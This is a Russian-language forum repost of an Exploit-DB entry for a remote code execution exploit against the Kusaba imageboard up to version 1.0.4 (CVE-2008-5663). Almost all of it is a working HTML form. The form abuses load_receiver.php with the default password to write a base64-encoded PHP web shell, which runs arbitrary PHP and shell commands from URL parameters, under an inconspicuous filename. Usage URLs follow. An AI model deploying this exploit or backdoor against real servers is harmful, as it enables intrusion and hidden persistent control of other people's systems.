Exploit Kusaba 1.0.4 - Remote Code Execution (2)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6711
Проверка EDB
  1. Пройдено
Автор
SAUSAGE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5663
Дата публикации
2008-10-09
HTML:
<!--
9 Oct 2008
Kusaba <= 1.0.4 Remote Code Execution Exploit #2
Sausage <[email protected]>

Will work if they have left the load_receiver.php script un-edited.

After execution: (Yes these are the exact URLs)
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?pc=print "Hello";
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?sc=echo Hello
-->
<pre>
<form action="./load_receiver.php" method="POST">
<input type="text" name="password" value="changeme"> <!-- Don't actually
change this, unless they have changed their password and you know it -->
<input type="text" name="type" value="direct">
<input type="text" name="file"
value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw==">
<!-- same backdoor from the paint_save.php exploit -->
<input type="text" name="targetname" value="post.php"> <!-- Any
inconspicuous filename will do -->

<input type="submit" value="Exploit">
</form>

# milw0rm.com [2008-10-09]
 
Источник
www.exploit-db.com

Похожие темы